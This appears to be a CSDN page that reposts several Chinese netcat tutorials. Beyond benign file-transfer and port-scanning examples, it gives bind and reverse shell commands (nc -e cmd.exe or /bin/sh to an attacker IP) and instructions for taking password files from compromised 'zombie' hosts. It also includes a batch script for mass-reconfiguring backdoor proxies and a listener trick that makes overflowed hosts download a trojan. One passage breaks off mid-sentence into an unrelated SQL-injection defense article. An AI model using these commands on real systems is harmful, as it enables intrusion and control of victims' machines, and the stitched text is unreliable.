nc_内存 - CSDN
精华内容
参与话题
  • Linux nc命令详解

    万次阅读 2014-07-30 10:12:15
    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、...通常的Linux发行版中都带有NetCat(简称nc),甚

    NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。

    一、版本
    通常的Linux发行版中都带有NetCat(简称nc),甚至在拯救模式光盘中也由busybox提供了简版的nc工具。但不同的版本,其参数的使用略有差异。
    NetCat 官方地址:http://netcat.sourceforge.net/

    引用[root@hatest1 ~]# cat /etc/asianux-release
    Asianux release 2.0 (Trinity SP2)
    [root@hatest1 ~]# cat /etc/redflag-release
    Red Flag DC Server release 5.0 (Trinity SP2)
    [root@hatest1 ~]# type -a nc
    nc is /usr/bin/nc
    [root@hatest1 ~]# rpm -q nc
    nc-1.10-22


    建议在使用前,先用man nc看看帮助。这里以红旗DC Server 5.0上的1.10版本进行简单说明。
    假设两服务器信息:

    引用server1: 192.168.228.221
    server2: 192.168.228.222


    二、常见使用
    1、远程拷贝文件

    从server1拷贝文件到server2上。需要先在server2上,用nc激活监听,server2上运行:

    引用[root@hatest2 tmp]# nc -lp 1234 > install.log


    server1上运行:

    引用[root@hatest1 ~]# ll install.log
    -rw-r--r--   1 root root 39693 12月 20   2007 install.log
    [root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log


    2、克隆硬盘或分区
    操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
    克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工具光盘)启动系统后,在server2上进行类似的监听动作:

    # nc -l -p 1234 | dd of=/dev/sda


    server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

    # dd if=/dev/sda | nc 192.168.228.222 1234


    ※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

    3、端口扫描

    可以执行:

    引用# nc -v -w 1 192.168.228.222 -z 1-1000
    hatest2 [192.168.228.222] 22 (ssh) open


    4、保存Web页面

    # while true; do nc -l -p 80 -q 1 < somepage.html; done



    5、模拟HTTP Headers

    引用[root@hatest1 ~]# nc www.linuxfly.org 80
    GET / HTTP/1.1
    Host: ispconfig.org
    Referrer: mypage.com
    User-Agent: my-browser

    HTTP/1.1 200 OK
    Date: Tue, 16 Dec 2008 07:23:24 GMT
    Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
    Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
    Expires: 0
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Cache-Control: private, post-check=0, pre-check=0, max-age=0
    Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Content-Type: text/html
    [......]


    在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。

    6、聊天
    nc还可以作为简单的字符下聊天工具使用,同样的,server2上需要启动监听:

    [root@hatest2 tmp]# nc -lp 1234



    server1上传输:

    [root@hatest1 ~]# nc 192.168.228.222 1234


    这样,双方就可以相互交流了。使用Ctrl+D正常退出。

    7、传输目录
    从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:

    引用[root@hatest2 tmp]# nc -l 1234 |tar xzvf -


    server1上运行:

    引用[root@hatest1 ~]# ll -d nginx-0.6.34
    drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
    [root@hatest1 ~]# tar czvf - nginx-0.6.34|nc 192.168.228.222 1234


    8、参数简介
    这仅是一个1.10版本的简单说明,详细的参数使用还是需要看man:

    引用想要连接到某处: nc [-options] hostname port[s] [ports] ...
    绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
    参数:
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h 帮助信息
    -i secs 延时的间隔
    -l 监听模式,用于入站连接
    -n 指定数字的IP地址,不能用hostname
    -o file 记录16进制的传输
    -p port 本地端口号
    -r 任意指定本地及远程端口
    -s addr 本地源地址
    -u UDP模式
    -v 详细输出——用两个-v可得到更详细的内容
    -w secs timeout的时间

    -z 将输入输出关掉——用于扫描时,其中端口号可以指定一个或者用lo-hi式的指定范围。 


    9、1.84版本参数简介1. nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
    2.    [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-x
    3.    proxy_address[:port]] [hostname] [port[s]]
     
    1. -4 强制使用ipv4
    2. -6 强制使用ipv6
    3. -D 允许socket通信返回debug信息
    4.       -d 不允许从标准输入中读取
    5. -h 显示nc帮助文档
    6. -i interval 
    7.    指定每行之间内容延时发送和接受,也可以使多个端口之间的连接延时
    8. -k 当一个连接结束时,强制nc监听另一个连接。必须和-l一起使用
    9. -l 用于监听传入的数据链接,不能与-p -z -s一起使用。-w 参数的超时也会被忽略
    10. -n 不执行任何地址,主机名,端口或DNS查询
    11. -p 指定nc使用的源端口,受权限限制且不能余-l一起使用
    12. -r 指定nc使用的源端口和目的端口,不能使用系统原来就指定的那些端口
    13. -S 允许在RFC 2385的TCP MD5签名选项
    14. -s source_ip_address 
    15.    指定用于发包的接口的IP地址,不能和-l一起使用
    16. -T ToS
    17.    指定链接的IP服务类型(TOS)
    18. -C 自动换行
    19. -t 使nc能够与telnet交互
    20. -U 使用UNIX域socket
    21. -u 使用udp代替默认的tcp选项
    22. -v 输出详细报告
    23. -w timeout
    24.     一个链接一段时间无操作,则自动断开,默认无超时
    25. -X proxy_version
    26.     指定nc使用代理时所采用的协议,可选的有socksv4,socks5以及https。默认socks5
    27. -x proxy_address[:port]
    28.     指定nc使用的代理地址和端口。默认设置:1080(SOCKS),3128(HTTPS)
    29. -z 只监听不发送任何包

     
    三、版本差异
    不用系统上提供的nc版本会有说不同,其提供的参数使用方法也略有差异。
    例如,红旗Asianux 3.0 SP1拯救光盘上的版本是供使用的参数仅有一部分:

    引用# nc -h
    BusyBox v1.2.0 (2008.04.14-01:35+0000) multi-call binary

    Usage: nc [OPTIONS] [IP] [port]

    Netcat opens a pipe to IP:port

    Options:
             -l               listen mode, for inbound connects
             -p PORT         local port number
             -i SECS         delay interval for lines sent
             -e PROG         program to exec after connect (dangerous!)
             -w SECS         timeout for connects and final net reads


    而在Asianux 3.0 SP1系统中提供的nc版本则是1.84的,按上面的参数用法写会执行不了:

    引用[root@ftpserver ~]# rpm -q nc
    nc-1.84-10
    [root@ftpserver ~]# nc -lp 1234
    usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
               [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
               [-x proxy_address[:port]] [hostname] [port[s]]


    讲查看man文档,可见在这个版本中,-l是不能与-s、-p、-z一起使用的,-w参数也会被忽略,所以,正确的用法是:

    [root@ftpserver tmp]# nc -l 1234



    四、用在脚本中
    nc每次启动监听后,都会在客户端连接完成并退出的同时,服务端一同退出。所以,如果需要不断的使用nc进行数据传输,需要在脚本中使用循环。利用nc实现更多的功能,可参考其rpm提供的参考脚本:

    引用# rpm -qd nc
    /usr/share/doc/nc-1.10/Changelog
    /usr/share/doc/nc-1.10/README
    /usr/share/doc/nc-1.10/scripts/README
    /usr/share/doc/nc-1.10/scripts/alta
    /usr/share/doc/nc-1.10/scripts/bsh
    /usr/share/doc/nc-1.10/scripts/dist.sh
    /usr/share/doc/nc-1.10/scripts/irc
    /usr/share/doc/nc-1.10/scripts/iscan
    /usr/share/doc/nc-1.10/scripts/ncp
    /usr/share/doc/nc-1.10/scripts/probe
    /usr/share/doc/nc-1.10/scripts/web
    /usr/share/doc/nc-1.10/scripts/webrelay
    /usr/share/doc/nc-1.10/scripts/websearch
    /usr/share/man/man1/nc.1.gz


    展开全文
  • NC工具的使用说明教程

    千次阅读 2018-11-23 11:33:31
    nc的使用方法 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和...

    转载地址:https://blog.csdn.net/xysoul/article/details/52270149

    nc的使用方法

    netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧......
    一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 

    在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。


    软件介绍:

    工具名:Netcat
    作者:Hobbit && Chris Wysopal
    网址:
    http://www.atstake.com/research/tools/network_utilities/
    类别:开放源码
    平台:Linux/BSD/Unix/Windows 
    WINDOWS下版本号:[v1.10 NT]

    参数介绍:

    nc.exe -h即可看到各参数的使用方法。
    基本格式:nc [-options] hostname port[s] [ports] ...
    nc -l -p port [options] [hostname] [port]

    -d 后台模式
    -e prog 程序重定向,一旦连接,就执行 [危险!!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h 
    帮助信息
    -i secs 延时的间隔
    -l 监听模式,用于入站连接
    -L 连接关闭后,仍然继续监听
    -n 指定数字的IP地址,不能用hostname
    -o file 记录16进制的传输
    -p port 本地端口号
    -r 随机本地及远程端口
    -s addr 本地源地址
    -t 使用TELNET交互方式
    -u UDP模式
    -v 详细输出--用两个-v可得到更详细的内容
    -w secs timeout的时间
    -z 将输入输出关掉--用于扫描时

    端口的表示方法可写为M-N的范围格式。


    基本用法:

    大概有以下几种用法:

    1)连接到REMOTE主机,例子:
    格式:nc -nvv 192.168.x.x 80
    讲解:连到192.168.x.x的TCP80端口


    2)监听LOCAL主机,例子:
    格式:nc -l -p 80
    讲解:监听本机的TCP80端口


    3)扫描远程主机,例子:
    格式:nc -nvv -w2 -z 192.168.x.x 80-445
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口


    4)REMOTE主机绑定SHELL,例子:
    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口


    5)REMOTE主机绑定SHELL并反向连接,例子:
    格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口


    以上为最基本的几种用法(其实NC的用法还有很多,
    当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

    高级用法:

    6)作攻击程序用,例子:
    格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
    讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)

    附:c:exploit.txt为shellcode等


    7)作蜜罐用[1],例子:
    格式:nc -L -p 80
    讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止.


    8)作蜜罐用[2],例子:
    格式:nc -L -p 80 > c:log.txt
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>’改为‘>>’即可以追加日志。

    附:c:log.txt为日志等


    9)作蜜罐用[3],例子:
    格式1:nc -L -p 80 < c:honeypot.txt
    格式2:type.exe c:honeypot.txt|nc -L -p 80
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送’入其管道中。

     

     

    NC工具的使用说明

    参数介绍: 
    nc.exe -h即可看到各参数的使用方法。 
    基本格式:nc [-options] hostname port [ports] ... 
    nc -l -p port [options] [hostname] [port]

    -d 后台模式 
    -e prog 程序重定向,一旦连接,就执行 [危险!!] 
    -g gateway source-routing hop point, up to 8 
    -G num source-routing pointer: 4, 8, 12, ... 
    -h 帮助信息 
    -i secs 延时的间隔 
    -l 监听模式,用于入站连接 
    -L 连接关闭后,仍然继续监听 
    -n 指定数字的IP地址,不能用hostname 
    -o file 记录16进制的传输 
    -p port 本地端口号 
    -r 随机本地及远程端口 
    -s addr 本地源地址 
    -t 使用TELNET交互方式 
    -u UDP模式 
    -v 详细输出--用两个-v可得到更详细的内容 
    -w secs timeout的时间 
    -z 将输入输出关掉--用于扫描时

    端口的表示方法可写为M-N的范围格式。


    ===========================================================================================
    基本用法:

    大概有以下几种用法:

    1)连接到REMOTE主机,例子: 
    格式:nc -nvv 192.168.x.x 80 
    讲解:连到192.168.x.x的TCP80端口


    2)监听LOCAL主机,例子: 
    格式:nc -l -p 80 
    讲解:监听本机的TCP80端口


    3)扫描远程主机,例子: 
    格式:nc -nvv -w2 -z 192.168.x.x 80-445 
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口


    4)REMOTE主机绑定SHELL,例子: 
    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口


    5)REMOTE主机绑定SHELL并反向连接,例子: 
    格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口


    以上为最基本的几种用法(其实NC的用法还有很多, 
    当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

    =========================================================================================== 
    高级用法:

    6)作攻击程序用,例子: 
    格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 
    格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt 
    讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果, 
    真是有异曲同工之妙:P)

    附:c:exploit.txt为shellcode等


    7)作蜜罐用[1],例子: 
    格式:nc -L -p 80 
    讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止


    8)作蜜罐用[2],例子: 
    格式:nc -L -p 80 > c:log.txt 
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>’ 
    改为‘>>’即可以追加日志

    附:c:log.txt为日志等


    9)作蜜罐用[3],例子:

    格式1:nc -L -p 80 < c:honeypot.txt

    格式2:type.exe c:honeypot.txt|nc -L -p 80

    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送’入其管道中如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,欺骗系统授予访问权限。

    系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库
    的安全权限决定。如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,包括添加、删除或更新数据,甚至可能直接删除表。

    二、如何防范?
    好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。

    ⑴ 对于动态构造SQL查询的场合,可以使用下面的技术:

    第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“Select * from Users Where login = or 1=1 AND password = or 1=1”显然会得到与“Select * from Users Where login = or 1=1 AND password = or 1=1”不同的结果。

    第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“Select * from Users Where login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。

    第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。

    ⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。

    ⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。

    ⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。

    在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。

    ⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。

    ⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。

    参数解释: 
    -e 程序重定向 
    -t 用telnet来回应 
    -l   监听本地端口 
    -p   指定本地端口 
    -v   获得端口信息 
    -vv   获得详细的端口信息 
    -z   关闭输入输出 
    -n   指定IP地址 
    -w 设定超时时间 
    -u   UDP端口

    我就知道这么些参数 了
    第一个: 
    nc -l -v -p 7626 
    这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了

    如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令: 
    nc -l -p 80 >>c:\\日志.dat 
    这样,凡是有针对本机80端口的攻击都会被记录下来的


    二、 
    如果你通过溢出进入了别人的机器,就可以运行: 
    nc -l -p 123 -e cmd.exe 
    或者是: nc -l -p 123 -t 
    作用都是以cmd.exe来响应到机器上123端口的连接 
    这样就把溢出的主机变成了一台telnet肉鸡了啊 
    你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 
    在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777 
    再在本地机器上运行: nc -l -p 777 
    意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口 
    你再在本地机上监听777端口,这样就进入了对方的cmd了 
    这也微十时毫 反弹端口式木马的原理了。


    三、 
    用这个命令: 
    nc -v 192.168.0.25 80 
    就获得了192.168.0.25的80端口的信息 
    可以获得IIS版本等很多重要信息 的

    四、 
    你也可以将NC作为扫描器使用: 
    nc -v -z 192.168.0.25 1-100 
    扫描192.168.0.25的1到100间的TCP端口

    用nc -v -z -u 192.168.0.25 1-100 
    这是扫描1到00间的UDP端口

     

    3.1.端口的刺探:

    nc -vv ip port 
    RIVER [192.168.0.198] 19190 (?) open //显示是否开放open


    3.2.扫描器

    nc -vv -w 5 ip port-port port 
    nc -vv -z ip port-port port

      这样扫描会留下大量的痕迹,系统管理员会额外小心。

    3.3. 后门

    victim machine: //受害者的机器 
    nc -l -p port -e cmd.exe //win2000 
    nc -l -p port -e /bin/sh //unix,linux 
    attacker machine: //攻击者的机器. 
    nc ip -p port //连接victim_IP,然后得到一个shell。


    3.4.反向连接 
    attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击. 
    //或者wollf的反向连接. 
    nc -vv -l -p port 
    victim machine: 
    nc -e cmd.exe attacker ip -p port 
    nc -e /bin/sh attacker ip -p port

    或者:

    attacker machine: 
    nc -vv -l -p port1  
    nc -vv -l -p prot2  
    victim machine: 
    nc attacker_ip port1 | cmd.exe | nc attacker_ip port2 
    nc attacker_ip port1 | /bin/sh | nc attacker_ip port2


      139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP),这样就可以保证nc.exe优先于NETBIOS。

    3.5.传送文件:

    3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来. 
    nc -d -l -p port < path\filedest     可以shell执行 
    nc -vv attacker_ip port > path\file.txt 需要Ctrl+C退出 
    //肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

    3.5.2 attacker machine --> victim machine //上传命令文件到肉鸡 
    nc -vv -l -p port > path\file.txt      需要Ctrl+C退出 
    nc -d victim_ip port < path\filedest   可以shell执行 
    //这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.


     3.6 端口数据抓包.

    nc -vv -w 2 -o test.txt xfocus.net 80 21-15

    < 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error 
    < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr 
    < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... 
    < 00000084 83 00 00 01 8f # .....


    3.7 telnet,自动批处理。

    nc victim_ip port < path\file.cmd   显示执行过程. 
    nc -vv victim_ip port < path\file.cmd   显示执行过程.

    nc -d victim_ip port < path\file.cmd 安静模式.

    _______________file.cmd________________________ 
    password 
    cd %windir% 
    echo []=[%windir%] 
    c: 
    cd \ 
    md test 
    cd /d %windir%\system32\ 
    net stop sksockserver 
    snake.exe -config port 11111 
    net start sksockserver 
    exit 
    _______________file.cmd__END___________________


    ######################################## 
    4. 管理肉鸡,更改肉鸡设置 
    ########################################

    4.1 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver",使用winshell后门. 端口1234 密码password

    命令格式就是:

    modi.bat youip.txt

    ___________modi.bat____

    ________________________ 
    @if "%1"=="" echo Error: no ip.txt &&goto END

    :start 
    @echo password >a.cmd 
    @echo s >>a.cmd 
    @echo cd /d %%windir%%\system32\ >>a.cmd 
    @net stop "sksockserver" >>a.cmd 
    @snake.exe -config port 11111 >>a.cmd 
    @net start "sksockserver" >>a.cmd 
    @exit >>a.cmd

    :auto 
    @for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

    :END 
    ___________modi.bat__END_______________________


    4.2 
    @echo off 
    color f0 
    :start 
    cls 
    C:\nc -vv -w 3 -l -p 80>>80.txt 
    goto start


      把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.

      肉鸡特征:

      1。unicode漏洞 
      2。guest密码为空,administrators组用户 
      3。其他漏洞

    一、基本使用:

    Quack# nc -h 
    [v1.10] 
      想要连接到某处: nc [-options] hostname port [ports] ... 
      绑定端口等待连接:   nc -l -p port [-options] [hostname] [port] 
      参数: 
        -e prog         程序重定向,一旦连接,就执行 [危险!!] 
        -g gateway       source-routing hop point, up to 8 
        -G num         source-routing pointer: 4, 8, 12, ... 
        -h           帮助信息 
        -i secs         延时的间隔 
        -l           监听模式,用于入站连接 
        -n           指定数字的IP地址,不能用hostname 
        -o file         记录16进制的传输 
        -p port         本地端口号 
        -r           任意指定本地及远程端口 
        -s addr         本地源地址 
        -u           UDP模式 
        -v   

            详细输出——用两个-v可得到更详细的内容 
        -w secs         timeout的时间 
        -z           将输入输出关掉——用于扫描时


      其中端口号可以指定一个或者用lo-hi式的指定范围。


    二、用于传输文件——ncp

    #! /bin/sh 
    ## 类似于rcp,但是是用netcat在高端口做的 
    ## 在接收文件的机器上做"ncp targetfile" 
    ## 在发送文件的机器上做"ncp sourcefile receivinghost" 
    ## 如果调用了 "nzp" ,会将传输文件压缩

    ## 这里定义你想使用的端口,可以自由选择 
    MYPORT=23456

    ## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改 
    # PATH=$:$ ; export PATH

    ## 下面这几行检查参数输入情况:

    test "$3" && echo "too many args" && exit 1 
    test ! "$1" && echo "no args?" && exit 1 
    me=`echo $0 | sed s+.*/++` 
    test "$me" = "nzp" && echo [compressed mode]

    # if second arg, its a host to send an [extant] file to. 
    if test "$2" ; then 
    test ! -f "$1" && echo "cant find $1" && exit 1 
    if test "$me" = "nzp" ; then 
      compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0 
    else 
      nc -v -w 2 $2 $MYPORT < "$1" && exit 0 
    fi 
    echo "transfer FAILED!" 
    exit 1 
    fi

    # 是否在接收文件机器当前目录有同名文件

    if test -f "$1" ; then 
    echo -n "Overwrite $1? " 
    read aa 
    test ! "$aa" = "y" && echo "[punted!]" && exit 1 
    fi 
    # 30 seconds oughta be pleeeeenty of time, but change if you want. 
    if test "$me" = "nzp" ; then 
    # 注意这里nc的用法,结合了重定向符号和管道 
    nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0 
    else 
    nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0 
    fi 
    echo "transfer FAILED!" 
    # clean up, since even if the transfer failed, $1 is already trashed 
    rm -f "$1" 
    exit 1

    这样的话,我只要在A机器上先 QuackA# ncp ../abcd 
    listening on 然后在另一台机器B上 
    QuackB#ncp abcd 192.168.0.2 
    quackb [192.168.0.1] 23456 (?) 
    A机上出现 
    open connect to [192.168.0.2] from quackb [192.168.0.1] 1027 
    #

      查看一下,文件传输完毕。

     

     

     

     

     

    ===========================================================================

    【本地运行】nc -v ip port

    【命令解释】扫瞄某 IP 的某个端口,返回信息详细输出。

    ===========================================================================

    【本地运行】nc -v -z ip port-port

    【命令解释】扫描某IP的端口到某端口,返回信息详细输出,但扫描速度较慢。

    ===========================================================================

    【本地运行】nc -v -z -u ip  port-port

    【命令解释】扫描某 IP 的某 UDP 端口到某 UDP 端口,返回信息详细输出,但扫描速度较慢。

    ===========================================================================

    【本地运行】nc -l -p 80 

    【命令解释】开启本机的 TCP 80 端口并监听。

    ===========================================================================

    【本地运行】nc -l -v -p 80

    【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。

    ===========================================================================

    【本地运行】nc -l -p 80 > E:/log.dat

    【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到 E:/log.dat 下的日志文件里。

    ===========================================================================

    【本地运行】nc -nvv 192.168.1.101 80 

    【命令解释】连接到192.168.1.101主机的 80 端口。

    ===========================================================================

    【本地运行】nc -nvv -w2 -z 192.168.1.101 80-1024 

    【命令解释】扫锚192.168.1.101的80-1024端口,连接超时时间为2秒。

    ===========================================================================

    【远程运行】nc -l -p 2012 -t -e cmd.exe

    【本地运行】nc -nvv 192.168.1.101 2012

    【命令解释】采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.101)上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到

    【命令解释】2012 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 2012 用于

    【命令解释】连接已经将 CMD 重定向到 2012 端口的远程主机(注:假设IP地址为 192.168.1.101)。

    ===========================================================================

    【本地运行】nc -l -p 2012

    【远程运行】nc -t -e cmd.exe 192.168.1.102 2012

    【命令解释】采用反向连接方式,先在本地主机运行 nc -l -p 2012 开启本地主机的(注:假设IP地址为 192.168.1.102)2012 端口并监听等待远程主

    【命令解释】机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为

    【命令解释】2012 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。

    ===========================================================================

    【本地运行】nc -v -n ip port < C:/sunzn.exe

    【远程运行】nc -v -l -p port > D:/sunzn.exe

    【命令解释】在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的

    【命令解释】对应端口上(注:命令行中的 IP 为接收文件的远程主机 IP ),在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并

    【命令解释】把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。

    ===========================================================================

    【本地运行】nc -L -p 8989<C:\ftp.txt ( ftp.txt 中为FTP自动下载命令)

    【命令解释】不停地监听 8989 端口,并把 C:\ftp.txt  中的内容发给任何一台连接本机 8989 端口的主机,可起到传送文件作用(此用法经常用于反向

    【命令解释】溢出)。溢出远程主机时,一旦溢出的远程主机连接本地主机 8989 端口,远程主机就会自动用 FTP 下载指定的文件,如木马。

    ===========================================================================

    写一篇简单一点的使用教程:

      

    命令1:监听命令

    nc -l -p port
    nc -l -p port > e:\log.dat
    nc -l -v -p port

    参数解释:

    -l:监听端口,监听入站信息
    -p:后跟本地端口号
    -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

    提示:一般大家都爱用-vv

    nc -l -p 80

    这个很简单,监听80端口
    如果机器上运行这个命令,端口80被认为是开放的,可以欺骗扫描器

    nc -l -p 80 > e:\log.dat

